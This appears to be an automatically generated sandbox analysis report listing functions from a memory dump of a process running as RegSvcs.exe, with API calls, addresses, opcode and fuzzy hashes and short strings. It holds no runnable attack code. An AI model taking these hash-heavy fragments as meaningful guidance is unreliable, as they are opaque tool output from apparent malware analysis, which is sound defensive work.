                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocHeap
                                                      • String ID:
                                                      • API String ID: 1835388192-0
                                                      • Opcode ID: 705029ce0baaa89f6bd69dbf513f7bd5691eedf6f6877ddb9fbf95f54199637d
                                                      • Instruction ID: 28aa74c608fcd6387d99c548fc39160726db92b948c9b0de06e70d001392f757
                                                      • Opcode Fuzzy Hash: 705029ce0baaa89f6bd69dbf513f7bd5691eedf6f6877ddb9fbf95f54199637d
                                                      • Instruction Fuzzy Hash: 3E51E171A00B04ABDB21DF6AD842B6AB3F5EF5C724F14156EE809DB351E738E901CB48
                                                      Function 00427110 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                      • String ID:
                                                      • API String ID: 3354401312-0
                                                      • Opcode ID: 43d528b51b35c9bbb2da3ec8c41d4e56f83747dbf66717eb6b125c5ac66ba4c8
                                                      • Instruction ID: 40a91d06e2e52990f7b6d67599c9d5afda9527cab6aa50ef88dbd7d7a38f50f2
                                                      • Opcode Fuzzy Hash: 43d528b51b35c9bbb2da3ec8c41d4e56f83747dbf66717eb6b125c5ac66ba4c8
                                                      • Instruction Fuzzy Hash: 76616E70E01229DFDF10DFA5D944BAEBBB4BF05308F54419EE805A7342DB39AA05CBA5
                                                      Function 0040F4B0 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0040F547
                                                      • CoCreateInstance.OLE32(0045DFB0,00000000,00000001,0045E010,?), ref: 0040F563
                                                      • CoUninitialize.OLE32 ref: 0040F571
                                                      • CoUninitialize.OLE32 ref: 0040F630
                                                      • CoUninitialize.OLE32 ref: 0040F644
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Uninitialize$CreateInitializeInstance
                                                      • String ID:
                                                      • API String ID: 1968832861-0
                                                      • Opcode ID: c0b01dbfa6797318106262dbd2fed837c9afe2e09affc095f62f3251812b7104
                                                      • Instruction ID: e86ff81544685c45070fe39142173a451fe33c36e56a07e1c3fb2bb4d0f15041
                                                      • Opcode Fuzzy Hash: c0b01dbfa6797318106262dbd2fed837c9afe2e09affc095f62f3251812b7104
                                                      • Instruction Fuzzy Hash: 6A51E471A00208AFDF14DF64DC84B9EBBB5EF48314F108539E805F7691D739A948CBA9
                                                      Function 00424F10 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00424F46
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00424F66
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00424F86
                                                      • std::_Facet_Register.LIBCPMT ref: 00425021
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00425039
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: de826de0b8665dce7b354b76897ab4d89b084adf4cf8c32ccdcbc88c9caf88b8
                                                      • Instruction ID: 634a645fbb89883a8048affa87e368f531f69a44de34e299c7b5b9c255acbea1
                                                      • Opcode Fuzzy Hash: de826de0b8665dce7b354b76897ab4d89b084adf4cf8c32ccdcbc88c9caf88b8
                                                      • Instruction Fuzzy Hash: FA41F371B002249BCB20DF55E980B6EB7B4EF80714F55416FE8066B381DB78AD01CBC9
                                                      Function 00440EBB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00440ED3
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00440EE5
                                                      • _free.LIBCMT ref: 00440EF7
                                                      • _free.LIBCMT ref: 00440F09
                                                      • _free.LIBCMT ref: 00440F1B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 976f773178b3a1b3aa785fdbb1b20de492f2985a2c0ef50a8997057c72e40866
                                                      • Instruction ID: 60032924811c2865658c18812589d751f3704ea8c5b5f64c4353d60af17ce8ba
                                                      • Opcode Fuzzy Hash: 976f773178b3a1b3aa785fdbb1b20de492f2985a2c0ef50a8997057c72e40866
                                                      • Instruction Fuzzy Hash: DDF04F32514300AB9E35EB65E881C1BB7E9EA54310B691C1EF908E7701DF78FC90869C
                                                      Function 00419710 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00002710,A99F1BC9,00000000,?), ref: 00419749
                                                        • Part of subcall function 0040A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A99F1BC9,00000000,?), ref: 0040A4BA
                                                      • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00467494,0000000E), ref: 004197C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFileFolderPathSleep
                                                      • String ID: Xv==$ZBmu
                                                      • API String ID: 70540035-658444483
                                                      • Opcode ID: e5849001c9129c7977783ef44150e774fff656bdb8885442c5f0908c86a9f48c
                                                      • Instruction ID: d8424b626564b53d3efe14781ec4d7e2cc7769f2fe4b5d16fb930cc59ee87601
                                                      • Opcode Fuzzy Hash: e5849001c9129c7977783ef44150e774fff656bdb8885442c5f0908c86a9f48c
                                                      • Instruction Fuzzy Hash: 24C1A130D04288DFEF14DFA8C958BDDBFB6AF45308F644199D4046B282D7B95E88CB65
                                                      Function 0043E947 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EA4B
                                                        • Part of subcall function 0043E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,004380F7,0000FDE9,8B18EC83,?,?,?,00437E70,0000FDE9,00000000,?), ref: 0043E50B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free
                                                      • String ID: PC$PC
                                                      • API String ID: 3242298965-546519453
                                                      • Opcode ID: 20d774936208bb7ee1843faed3b48977cd8e7a89bce7e7f6d6b8a400a86d1594
                                                      • Instruction ID: 15c659c6739a36d7261b53587305968e72243a2b27e5f2b2920781d657e0185c
                                                      • Opcode Fuzzy Hash: 20d774936208bb7ee1843faed3b48977cd8e7a89bce7e7f6d6b8a400a86d1594
                                                      • Instruction Fuzzy Hash: 89811471A01205ABDF11AFA6DC42ABFB7A9EF18704F54502BF901AB2C1E7399E41C758
                                                      Function 004032B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402C20: ___std_exception_copy.LIBVCRUNTIME ref: 00402C53
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004032EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy$ExceptionRaise
                                                      • String ID: 0EF$$@$$@
                                                      • API String ID: 2103344913-2852628486
                                                      • Opcode ID: 8adf70b5d305bf464acd20592c93b0a280aa532aff59f374aeea1d5046d9d002
                                                      • Instruction ID: 33c9e7119714e7a37c22dc624428f2d6ddf9f7398783dbb109712563da6ae978
                                                      • Opcode Fuzzy Hash: 8adf70b5d305bf464acd20592c93b0a280aa532aff59f374aeea1d5046d9d002
                                                      • Instruction Fuzzy Hash: ECF0E5B2D1031C67C715EBE5EC0198AB7ACDE15704B50852BFA10B7902FB74B64883A9
                                                      Function 00402A60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402A7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: 0*@$0*@$$@
                                                      • API String ID: 2659868963-1365470675
                                                      • Opcode ID: fe13fb0a393673d3aac30e6f5fbe972e5de8e17296f38addbdd5cd554e8ae16e
                                                      • Instruction ID: 97a03de475351f7a2bca72f3d98f058574c121d629282b5af2dbe3d92ee012ff
                                                      • Opcode Fuzzy Hash: fe13fb0a393673d3aac30e6f5fbe972e5de8e17296f38addbdd5cd554e8ae16e
                                                      • Instruction Fuzzy Hash: D2F030B6A00705AB8710DF5AD400986F7ECFF59311315C62BE919D7B10F7B4B868CBA4
                                                      Function 004391C5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                      • Instruction ID: a04617e534a5e6a8668232e222c2b3acc4ffab12b6af52f77dfb0eee37f51b27
                                                      • Opcode Fuzzy Hash: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                      • Instruction Fuzzy Hash: B8B136729046459FDB11CF68C8417AFBBE5EF5D300F1491ABE8459B382D6BC8D02CB68
                                                      Function 00409A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,?,A99F1BC9,00000000), ref: 00409A99
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409B00
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00409B07
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcVersion
                                                      • String ID:
                                                      • API String ID: 3310240892-0
                                                      • Opcode ID: a503b0e7cc449db335841ad7ab9a773665695323589175055db12fc1e23ed090
                                                      • Instruction ID: bd7fc4279f14078bc3a6410a73fa419a0c5c03756ad06a072f11fca4877197c3
                                                      • Opcode Fuzzy Hash: a503b0e7cc449db335841ad7ab9a773665695323589175055db12fc1e23ed090
                                                      • Instruction Fuzzy Hash: CA515970E042589BDB14EF68DD457DEB774EB45314F5042BAE804A73C2EB389EC08B99
                                                      Function 0044718E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 0044725E
                                                      • _free.LIBCMT ref: 00447287
                                                      • SetEndOfFile.KERNEL32(00000000,004439ED,00000000,00443C84,?,?,?,?,?,?,?,004439ED,00443C84,00000000), ref: 004472B9
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,004439ED,00443C84,00000000,?,?,?,?,00000000), ref: 004472D5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1547350101-0
                                                      • Opcode ID: d29c09d9e296d4adf2ce22184a14b2fab795c51f593fd17517760519ce477a22
                                                      • Instruction ID: 09b017ae8ededa8dd7b1ea515ad0bf4c2df776c640b9ad3cd90ae46bc27b6ccf
                                                      • Opcode Fuzzy Hash: d29c09d9e296d4adf2ce22184a14b2fab795c51f593fd17517760519ce477a22
                                                      • Instruction Fuzzy Hash: 284126729086009AEB11ABB98C42B9F3765FF48324F24159BF914E73A1DBBCC9024769
                                                      Function 0042EAB6 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4704e0f1fd3b11a56a9c74060ca5e1b75ea5182f1298efef6483e410a222a90
                                                      • Instruction ID: 03983285e4344cda00197c73dab7651fa2de86250539e33279241a3da3fab7b8
                                                      • Opcode Fuzzy Hash: c4704e0f1fd3b11a56a9c74060ca5e1b75ea5182f1298efef6483e410a222a90
                                                      • Instruction Fuzzy Hash: 7B41D771B00714AFE724EF3ADC41B9BBFA9EB48710F50852FF012DB281D6B9A9418784
                                                      Function 00402F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                      • String ID:
                                                      • API String ID: 3264154886-0
                                                      • Opcode ID: 19e2a188049c5894ca11fd6ef1a88c317df4824be80c47bc799430bad589e922
                                                      • Instruction ID: 6d290b131966a57fc63d46ce4638b3526e9ef90feb23ba4a8d0d0e0be83c2de6
                                                      • Opcode Fuzzy Hash: 19e2a188049c5894ca11fd6ef1a88c317df4824be80c47bc799430bad589e922
                                                      • Instruction Fuzzy Hash: 7541BDB1A026119FCB11DF25D944B5ABBE8BF18318F04453EE81AD7790EB39E900CBC5
                                                      Function 0043EFB3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0042E958: _free.LIBCMT ref: 0042E966
                                                        • Part of subcall function 0043E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,004380F7,0000FDE9,8B18EC83,?,?,?,00437E70,0000FDE9,00000000,?), ref: 0043E50B
                                                      • GetLastError.KERNEL32 ref: 0043F01B
                                                      • __dosmaperr.LIBCMT ref: 0043F022
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043F061
                                                      • __dosmaperr.LIBCMT ref: 0043F068
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: 66a6233bd8662e0535dd27a9fe65b24e76e5808839ee4bbdd85bd2a5aa3b6b8f
                                                      • Instruction ID: 5705714bb8414e06a77441d39309be38108af8e058fa10dd69e29da557a8ec21
                                                      • Opcode Fuzzy Hash: 66a6233bd8662e0535dd27a9fe65b24e76e5808839ee4bbdd85bd2a5aa3b6b8f
                                                      • Instruction Fuzzy Hash: 82210871A05609BF9B205F668C80D2B776DEF0C368F10553AF924D7292D739EC4487A9
                                                      Function 00436DD0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                      • _free.LIBCMT ref: 00436E32
                                                      • _free.LIBCMT ref: 00436E68
                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: c572c4aaf3847cb2b4cc91d51ab0c8d7b335412c2af02a72975859a843b434aa
                                                      • Instruction ID: a4166cf88256f44b99565f39f78425332fe0beff0162f420f1608f4976c6b809
                                                      • Opcode Fuzzy Hash: c572c4aaf3847cb2b4cc91d51ab0c8d7b335412c2af02a72975859a843b434aa
                                                      • Instruction Fuzzy Hash: CE11EB752003037A8B1133659C82A2B266A9BD977DF26633FF124962E2ED6DCC05411E
                                                      Function 00436F27 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00420D37,00420D37,8B18EC83,00431267,00438428,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00436F2C
                                                      • _free.LIBCMT ref: 00436F89
                                                      • _free.LIBCMT ref: 00436FBF
                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00436FCA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: cb573d47580b169657372487180f4c216382a616dbdcf0fe4bab6662a542a304
                                                      • Instruction ID: 8e88054898ceb52abecb7deb45702a8fe7e48457730a4ea2a2ff532377063cd4
                                                      • Opcode Fuzzy Hash: cb573d47580b169657372487180f4c216382a616dbdcf0fe4bab6662a542a304
                                                      • Instruction Fuzzy Hash: EF11CA712043027ACB1177666C81E37666A9BC9779F26233FF218D22E2EE6DCC05451E
                                                      Function 00439E9F Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00445997,?,?,?,00000020,00000001), ref: 00439EB5
                                                      • GetLastError.KERNEL32(?,00445997,?,?,?,00000020,00000001), ref: 00439EBF
                                                      • __dosmaperr.LIBCMT ref: 00439EC6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2398240785-0
                                                      • Opcode ID: 8cbf9aad02c880dbf15ad90c48f2a92ac3fc3d8c0e0115e1d68da830d2ed5290
                                                      • Instruction ID: f4905dddf45fba5913c4f3bd7f7b993a752e58d3391f1608b586a18716b284c1
                                                      • Opcode Fuzzy Hash: 8cbf9aad02c880dbf15ad90c48f2a92ac3fc3d8c0e0115e1d68da830d2ed5290
                                                      • Instruction Fuzzy Hash: 86F0AD32200101BBCB206FA2CC0998BBF69FF4C7A1B049426F619C3260CB75EC21C7E8
                                                      Function 00439F08 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00445922,?,?,?,?,00000020,00000001), ref: 00439F1E
                                                      • GetLastError.KERNEL32(?,00445922,?,?,?,?,00000020,00000001), ref: 00439F28
                                                      • __dosmaperr.LIBCMT ref: 00439F2F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2398240785-0
                                                      • Opcode ID: fb08d9ee05810b2fde417ebc3ee9e9a8b4e431a86164122e041f2bd89720e18c
                                                      • Instruction ID: 6036fd292b85d709bb5c160df205add55e4c87e98bfc454a0d3b4d3ae8ee55eb
                                                      • Opcode Fuzzy Hash: fb08d9ee05810b2fde417ebc3ee9e9a8b4e431a86164122e041f2bd89720e18c
                                                      • Instruction Fuzzy Hash: 06F06D32204615BB9B202FA3DC0898BBF69FF4C7A1B009526F518D6560C779EC21CBD8
                                                      Function 004474FA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000), ref: 00447511
                                                      • GetLastError.KERNEL32(?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?,00000000,?,00438092,8B18EC83), ref: 0044751D
                                                        • Part of subcall function 004474E3: CloseHandle.KERNEL32(FFFFFFFE,0044752D,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?,00000000), ref: 004474F3
                                                      • ___initconout.LIBCMT ref: 0044752D
                                                        • Part of subcall function 004474A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004474D4,00443FCF,00000000,?,00437B46,?,?,00000000,?), ref: 004474B8
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?), ref: 00447542
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: c56aa034153e7384cbee5bfc4e00f3a5dbb98655cb3f0d0a58f3d6a5b7d5b79a
                                                      • Instruction ID: 8cee21a586823bbb656bd92e21e7a914b34fe6bf467dd77b14e68005d0a38925
                                                      • Opcode Fuzzy Hash: c56aa034153e7384cbee5bfc4e00f3a5dbb98655cb3f0d0a58f3d6a5b7d5b79a
                                                      • Instruction Fuzzy Hash: 36F03936004269BBDF622F92DC09BDA3F66FB097A1F014025FA08D5631E732DC219B99
                                                      Function 00434709 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00434712
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00434725
                                                      • _free.LIBCMT ref: 00434736
                                                      • _free.LIBCMT ref: 00434747
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 704fe6289b8f143d9a26ff059708b995ea59a4fdcfa7f0ac5acbcaa82e73d9cd
                                                      • Instruction ID: 1da69f597a2ce6a3d76abb69257222dcc8979614f2f0434a1f14b28e78c126af
                                                      • Opcode Fuzzy Hash: 704fe6289b8f143d9a26ff059708b995ea59a4fdcfa7f0ac5acbcaa82e73d9cd
                                                      • Instruction Fuzzy Hash: 5BE09AB58213219A8E12AF16EC01486BA39A798754F05502EF80822236EBFD0956DF8F
                                                      Function 0043346D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 004334FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 9b1f1b54ab89344f379d9a06692492a77bae97b690f0fd6d344f710797a60ab4
                                                      • Instruction ID: 76716456ed47391b51d1e1841b8522cac03791be4ebd9feac55ea1cb2584b1ed
                                                      • Opcode Fuzzy Hash: 9b1f1b54ab89344f379d9a06692492a77bae97b690f0fd6d344f710797a60ab4
                                                      • Instruction Fuzzy Hash: 56518D61D0A201A6CF217F15C90137F27A4AB48713F20A96BE4C1413E9EB3DCD959A4E
                                                      Function 00433B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      • API String ID: 0-4009286469
